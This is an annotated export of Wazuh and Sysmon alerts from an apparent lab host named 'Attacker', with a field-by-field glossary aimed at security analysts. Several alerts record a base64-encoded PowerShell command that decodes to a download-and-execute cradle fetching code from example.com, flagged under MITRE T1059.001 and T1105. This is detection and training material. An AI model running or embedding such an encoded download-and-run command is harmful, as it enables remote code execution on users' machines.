rule.firedtimes: 29 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534219.1096594 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:08.9070653Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282583 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:08.897
ProcessGuid: {94294ddc-bcd7-680a-d00a-000000000e00}
ProcessId: 652
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4zn2k3va.n12.ps1
CreationUtcTime: 2025-04-24 22:36:08.897
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:08.897 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcd7-680a-d00a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 652 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4zn2k3va.n12.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:08.897 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 26 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534220.1099355 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:11.0618882Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282615 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:09.916
ProcessGuid: {94294ddc-bcd9-680a-d30a-000000000e00}
ProcessId: 852
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcd7-680a-d00a-000000000e00}
ParentProcessId: 652
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:09.916 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcd9-680a-d30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 852 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcd7-680a-d00a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 652 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 30 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534220.1107410 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:11.3086728Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282616 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:11.299
ProcessGuid: {94294ddc-bcd9-680a-d30a-000000000e00}
ProcessId: 852
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_qvvde2p2.pvc.ps1
CreationUtcTime: 2025-04-24 22:36:11.299
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:11.299 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcd9-680a-d30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 852 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_qvvde2p2.pvc.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:11.299 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 27 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534220.1110171 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:13.4580716Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282642 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:12.326
ProcessGuid: {94294ddc-bcdc-680a-d60a-000000000e00}
ProcessId: 8684
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcd9-680a-d30a-000000000e00}
ParentProcessId: 852
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:12.326 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcdc-680a-d60a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8684 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcd9-680a-d30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 852 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 31 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534220.1118230 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:13.7009783Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282643 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:13.637
ProcessGuid: {94294ddc-bcdc-680a-d60a-000000000e00}
ProcessId: 8684
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_wxd2cw3n.5ae.ps1
CreationUtcTime: 2025-04-24 22:36:13.634
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:13.637 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcdc-680a-d60a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8684 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_wxd2cw3n.5ae.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:13.634 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
